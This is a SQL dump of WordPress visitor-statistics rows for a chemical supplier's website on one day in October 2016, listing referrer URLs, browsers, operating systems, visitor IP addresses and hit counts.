INSERT INTO `wp_statistics_visitor` VALUES (4028, '2016-10-14', 'https://translate.googleusercontent.com/translate_p?hl=tr&prev=search&sl=en&u=https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/&depth=1&rurl=translate.google.com.tr&usg=ALkJrhgAAAAAWACOS0UkDSXkys4RHTlzvhuahEnjELtQ', 'Chrome', 'Windows', '49.0.2623.112', '', '78.182.137.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4029, '2016-10-14', 'https://rada.ru/souvenir/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4030, '2016-10-14', 'https://www.google.com.tr/', 'Firefox', 'Windows', '49.0', '', '92.44.31.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4031, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4032, '2016-10-14', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4033, '2016-10-14', 'https://www.google.com.tr/', 'Chrome', 'Android', '53.0.2785.124', '', '92.44.31.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4034, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4035, '2016-10-14', 'https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/', 'MSIE', 'Windows', '9.0', '', '204.79.180.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4036, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4037, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4038, '2016-10-14', 'https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/', 'MSIE', 'Windows', '9.0', '', '204.79.180.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4039, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '24.0.1295.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4040, '2016-10-14', 'https://www.google.com/url?url=https://www.miller-stephenson.com/miller/pdf/MS-555,%2520557.pdf&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiC0JSd9dnPAhXGy1QKHXqhAZ4QFggaMAE&usg=AFQjCNFJqBPG6-Cmyp8Rfr3Xzx50HcXHtQ', 'MSIE', 'Windows', '8.0', '', '58.26.106.196', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4041, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4042, '2016-10-14', 'https://www.miller-stephenson.com/krytox-valve-lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4043, '2016-10-14', 'https://translate.googleusercontent.com/translate_p?hl=tr&prev=search&sl=en&u=https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/&depth=1&rurl=translate.google.com.tr&usg=ALkJrhgAAAAAWACezcI-5KVOIHqfe93wBcUh-oueR7sg', 'Chrome', 'Windows', '53.0.2785.143', '', '78.188.172.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4044, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4045, '2016-10-14', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4046, '2016-10-14', 'https://www.miller-stephenson.com/krytox-aviation/', 'MSIE', 'Windows', '9.0', '', '204.79.180.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4047, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4048, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4049, '2016-10-14', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwip87GY-NnPAhVrBsAKHVuWDPEQFgg3MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fopteon-sion-vapor-degreasing%2F&usg=AFQjCNHrrXIenkjoc9PHs1HOQO1P_Z07Ug', 'MSIE', 'Windows', '11.0', '', '193.251.41.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4050, '2016-10-14', 'https://dengi-pod-zalog-nedvizhimosti.ru/', 'MSIE', 'Unknown', '6.0', '', '37.115.187.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4051, '2016-10-14', 'https://avtolombard-krasnodar.ru/', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4052, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.3.80.84', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4053, '2016-10-14', 'https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4054, '2016-10-14', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4055, '2016-10-14', 'https://r.search.yahoo.com/_ylt=A9mSs3XMqwBYhmcAgZpLBQx.;_ylu=X3oDMTEyMTZ0OWQ4BGNvbG8DaXIyBHBvcwMxBHZ0aWQDQjEzODJfMQRzZWMDc3I-/RV=2/RE=1476467788/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fms-475c%2f/RK=0/RS=_tAjEjodCal0nVFlzl_W9pRtZM0-', 'MSIE', 'Windows', '11.0', '', '159.221.184.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4056, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4057, '2016-10-14', 'https://www.miller-stephenson.com/krytox-oxygen-pump-lubricant/', 'MSIE', 'Windows', '9.0', '', '204.79.180.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4058, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&ved=0ahUKEwiRnrnyh9rPAhVEMyYKHdW8DCIQFggtMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w', 'MSIE', 'Windows', '11.0', '', '216.235.129.38', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4059, '2016-10-14', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '131.176.243.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4060, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4061, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '166.216.157.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4062, '2016-10-14', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjKvv-GjNrPAhXFShQKHe4bA8kQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2F157-fsl%2F&usg=AFQjCNGbgfl9cHc-ETJizWt_DmpR6ieaUA&bvm=bv.135475266,d.bGs', 'MSIE', 'Windows', '11.0', '', '109.233.146.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4063, '2016-10-14', 'https://www.google.fi/', 'Firefox', 'Windows', '49.0', '', '194.136.136.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4064, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4065, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4066, '2016-10-14', 'https://www.google.cz/', 'Firefox', 'Windows', '49.0', '', '213.226.225.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4067, '2016-10-14', 'https://r.search.yahoo.com/RV=1/RE=1476471868/RB=/RO=8/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RS=^ADAJ_6caJotlWk94myX448yBrx2ZKw-', 'Safari', 'iPhone', '10.0', '', '174.199.18.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4068, '2016-10-14', 'https://www.google.com.tr/', 'Firefox', 'Windows', '49.0', '', '212.175.18.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4069, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.157.182.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4070, '2016-10-14', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.8.1', '', '52.200.30.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4071, '2016-10-14', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4072, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.66.24.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4073, '2016-10-14', 'https://meduza-consult.ru/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4074, '2016-10-14', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiK34PBmtrPAhXIPT4KHXS6DIIQFgg1MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '131.137.245.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4075, '2016-10-14', 'https://www.google.de', 'Firefox', 'Windows', '45.0', '', '134.96.17.35', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4076, '2016-10-14', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4077, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '71.40.21.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4078, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4079, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4080, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4081, '2016-10-14', 'https://www.miller-stephenson.com/wp-admin/post.php?post=620&action=edit', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 302, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4082, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '52.42.184.30', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4083, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4084, '2016-10-14', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '216.242.151.195', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4085, '2016-10-14', 'https://ibb.com.ua/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4086, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4087, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '76.195.112.218', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4088, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '9.0', '', '199.185.0.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4089, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4090, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4091, '2016-10-14', 'https://www.uroki.net/', 'Opera', 'Windows', '7.11', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4092, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '4.0.4', '', '209.133.111.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4093, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.166.66.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4094, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '50.82.72.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4095, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '66.150.8.161', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4096, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.235.209.180', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4097, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.94.80.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4098, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwi7guv5sNrPAhXI6iYKHfXBDnAQFgg_MAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-221%2F&usg=AFQjCNEa4_btRims8_mCYlgnPKIfzd6GNg&sig2=kD9R7waEI2Rweez1Yv6Z5w', 'MSIE', 'Windows', '11.0', '', '12.4.27.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4099, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4100, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4101, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '45.0.2454.94', '', '174.199.7.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4102, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.205.120.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4103, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '204.76.30.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4104, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.48.254.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4105, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.82', '', '199.254.206.4', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4106, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4107, '2016-10-14', 'https://www.miller-stephenson.com/product/krytox-gpl-106/', 'Safari', 'iPhone', '7.0', '', '199.30.24.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4108, '2016-10-14', 'https://www.google.com/search?hl=en-GB&redir_esc=&client=ms-android-samsung&source=android-com.sec.android.app.twlauncher&v=133247963&qsubts=1476453391572&q=ms+381hc&v=133247963', 'Android Browser', 'Android', '4.0', '', '14.192.215.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4109, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '73.157.93.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4110, '2016-10-14', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjp2pLFutrPAhWV0YMKHeziBocQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fsolvsys%2F&usg=AFQjCNHwnwv-phXOZtryGtezeF2J4a2-ow', 'MSIE', 'Windows', '11.0', '', '172.16.33.44', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4111, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.70.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4112, '2016-10-14', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4113, '2016-10-14', 'https://www.google.com.br/', 'Chrome', 'Windows', '49.0.2623.112', '', '186.206.237.64', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4114, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4115, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwivvdnQvdrPAhVBHx4KHRbqBf0QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-475c%2F&usg=AFQjCNFniyqXNNx9QMpAtKrQ5Xf0CEas_A&sig2=_3HVE6bfn40Cd3NIMWbNGw&bvm=bv.135475266,d.dmo', 'MSIE', 'Windows', '11.0', '', '65.82.185.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4116, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.22', '', '117.25.127.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4117, '2016-10-14', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.112.226.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4118, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjIxPmxwtrPAhVC94MKHeO5AUEQFghCMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '11.0', '', '206.40.122.135', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4119, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '31.0.1650.57', '', '82.80.249.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4120, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '31.0.1650.63', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4121, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '33.0', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4122, '2016-10-14', 'https://r.search.yahoo.com/_ylt=AwrTcdo57gBY6f8AXWgnnIlQ;_ylu=X3oDMTEyM2hqNjBzBGNvbG8DZ3ExBHBvcwM2BHZ0aWQDQjI1ODBfMQRzZWMDc3I-/RV=2/RE=1476484793/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepon-828%2f/RK=0/RS=8ndnfEnN4OvjtwP32whx5Ao6KMQ-', 'Firefox', 'Windows', '49.0', '', '172.16.10.146', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4123, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4124, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4125, '2016-10-14', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '96.43.40.199', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4126, '2016-10-14', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.73.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4127, '2016-10-14', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj136jxxdrPAhWj0FQKHfI4BzoQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxp-1a6%2F&usg=AFQjCNHEopLCoQnbkwVHP259veFpI36KhQ&sig2=S6aKRb1GxfJjfWlonMEI2w', 'MSIE', 'Windows', '11.0', '', '69.46.103.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4128, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwj13-a5xtrPAhXIQSYKHdDwBVwQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '10.0', '', '65.203.145.101', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4129, '2016-10-14', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '141.212.200.44', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4130, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.1.173.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4131, '2016-10-14', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '38.127.180.3', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4132, '2016-10-14', 'https://www.bing.com/search?q=gpl-106+pfpe+oil&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '205.213.4.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4133, '2016-10-14', 'https://www.miller-stephenson.com/', 'Edge', 'Windows', '14.14393', '', '173.161.65.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4134, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '172.110.86.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4135, '2016-10-14', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj534qIytrPAhUI64MKHUicBHMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&sig2=6M9cT5xXWNlol1By0dWdyA&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '11.0', '', '207.107.233.124', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4136, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.101.136.224', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4137, '2016-10-14', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '205.178.77.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4138, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.55.227.91', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4139, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.101', '', '35.1.174.116', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4140, '2016-10-14', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Firefox', 'Windows', '49.0', '', '140.252.33.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4141, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.118.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4142, '2016-10-14', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.112.96.155', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4143, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4144, '2016-10-14', 'https://www.miller-stephenson.com/krytox-automotive/', 'MSIE', 'Windows', '9.0', '', '204.79.180.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4145, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '81.136.168.168', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4146, '2016-10-14', 'https://www.miller-stephenson.com/contact_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.22.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4147, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '71.251.36.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4148, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4149, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4150, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4151, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '134.74.184.14', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4152, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.59', '', '98.167.192.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4153, '2016-10-14', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '201.151.56.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4154, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiNjc2E09rPAhVYNoEKHdsyByMYABAF&sig=AOD64_0abSbe6DFd5dbXrR5FtVk1GQD-Ag&rct=j&q=&ved=0ahUKEwjutMiE09rPAhWDJiYKHW9hAwcQ0QwIKQ&adurl=', 'MSIE', 'Windows', '11.0', '', '97.75.122.110', '000', 3, 0); 
